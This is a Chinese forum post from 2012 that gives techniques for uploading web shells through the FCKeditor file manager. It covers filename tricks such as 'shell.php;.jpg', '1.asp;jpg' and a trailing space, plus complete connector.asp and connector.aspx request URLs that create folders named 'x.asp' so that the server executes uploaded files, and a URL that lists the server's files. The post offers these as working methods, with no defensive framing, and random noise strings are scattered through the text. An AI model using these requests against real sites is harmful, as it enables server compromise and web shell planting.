很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
( Z0 ~# S; T& [7 [7 g* t* m! Z# k1 D. Q3 p1 G
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。$ \: F* Q3 r( N- F" |7 `. R
9 H0 e& P! u7 K$ H, B) p" p2 `
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
+ `* B5 Y* e+ f
' x( F# u" f( ~/ y. E" b! V+ M' Z突破建立文件夹:
4 G( X! ?5 H% P# L# V6 B
8 z8 y% b x: a1 neditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp* n$ j9 {% _) a9 ]9 V' A8 w
9 I' K [. `0 ~: E8 H0 F参数:
7 z1 c* z+ O/ M2 u, T+ ]7 u( s+ ^* q5 V
当前目录名:CurrentFolder=/qing.asp
$ n& q+ R" y8 q0 w2 D0 E: }5 a1 S0 F6 o {: Y; H' l+ u
新的目录名:NewFolderName=x.asp5 j2 i$ V8 P- a7 E5 G0 m6 J& c. T3 y
. b3 S8 O* X# F1 s4 ]
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……. t) B$ J% A0 |3 v* i/ W5 t
& N# @3 p2 X8 Y N+ m
那么 x.asp 就已经建立生成了,此方法百试百灵!
6 ~& E6 m3 }9 m e
+ t& p9 O9 J9 X* t新建文件夹参数 x.asp,基本都能搞定。. `0 n5 n# s5 ]
( q" b! ]' c+ M0 I/ f下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
' s/ b. S6 x( x* x" f. N
* @- h8 y" [# }$ faspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp: `% O; {8 d9 p* ~$ F
. h# C0 D0 M3 g4 N获取文件列表
) O0 T% x9 d& h% M8 S aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F) X' `0 }! J! F7 M
5 d2 r- P) Y. S |
发表于 2012-12-31 09:27:09
收藏
支持
反对